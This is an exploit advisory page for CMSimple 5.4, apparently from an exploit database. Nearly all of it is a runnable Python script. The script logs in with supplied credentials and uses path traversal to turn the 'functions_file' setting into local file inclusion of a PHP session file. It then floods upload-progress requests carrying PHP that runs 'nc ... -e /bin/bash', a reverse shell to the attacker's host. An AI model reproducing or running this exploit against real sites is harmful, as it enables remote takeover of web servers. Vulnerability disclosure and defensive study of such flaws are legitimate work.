CMSimple 5.4 Local File Inclusion / Remote Code Execution

2021.11.25
Credit: S1lv3r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated) # Date: 11/15/2021 # Exploit Author: S1lv3r # Vendor Homepage: https://www.cmsimple.org/en/ # Software Link: https://www.cmsimple.org/en/ # Version: CMSimple 5.4 # Tested on: CMSimple 5.4 # writeup: # https://github.com/iiSiLvEr/CMSimple5.4-Vulnerabilities #!/usr/bin/python3 import requests import threading import datetime import sys from bs4 import BeautifulSoup x = datetime.datetime.now() addSeconds = datetime.timedelta(0, 10) Time = x + addSeconds proxies = {"http": "http://127.0.0.1:8080","https": "https://127.0.0.1:8080",} def Login(): try: global Time s = requests.Session() headers= {"Content-Type": "application/x-www-form-urlencoded"} data = f'login=true&selected=Welcome_to_CMSimple_5&User={User}&passwd={Password}&submit=Login' response = s.post(RHOST, data=data, headers=headers, verify=False)#, proxies=proxies if response.cookies['passwd']: print("(+) Sucessfully Logged In With " + User + ":" + Password) cookies = response.cookies params = (('file', 'config'),('action', 'array'),) response = s.get(RHOST ,cookies=cookies ,params=params,verify=False) soup = BeautifulSoup(response.text, 'lxml') CsrfValue = soup.find('input',attrs = {'name':'csrf_token'})['value'] print("(+) Get CSRF Token : [ " + CsrfValue + " ]") data = f'csrf_token={CsrfValue}&functions_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_S1lv3r&form=array&file=config&action=save' response = s.post(RHOST, headers=headers, cookies=cookies, data=data, verify=False) print("(+) Changing Functions file Done ") print("(+) Check Your nc listner on " + LPORT) except Exception as error: print("Error, Exiting;( ") print(error) pass def fuzz(): while True: try: sessionName = "S1lv3r" cookies = {'PHPSESSID': sessionName} files = 
{'PHP_SESSION_UPLOAD_PROGRESS':(None, '<?php passthru("nc '+ LHOST +' '+ LPORT + ' -e /bin/bash");?>'), 'file': ('Anything', 'S1lv3r'*100, 'application/octet-stream')} x = requests.post(RHOST, files=files, cookies=cookies, verify=False)#, proxies=proxies except Exception as error: print(error) exit() def main(): print("\n(+) CMSimple LFI to RCE \n") Login() threads = [] for _ in range(20): t = threading.Thread(target=fuzz) t.start() threads.append(t) for thread in threads: thread.join if __name__ == "__main__": if len(sys.argv) <= 5: print("\n(-) Usage: {} <RHOST> <LHOST> <LPORT> <USER> <PASS>".format(sys.argv[0])) print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0])) print("\n(=) SiLvEr \n") exit() else: RHOST = sys.argv[1] LHOST = sys.argv[2] LPORT = sys.argv[3] User = sys.argv[4] Password = sys.argv[5] main()

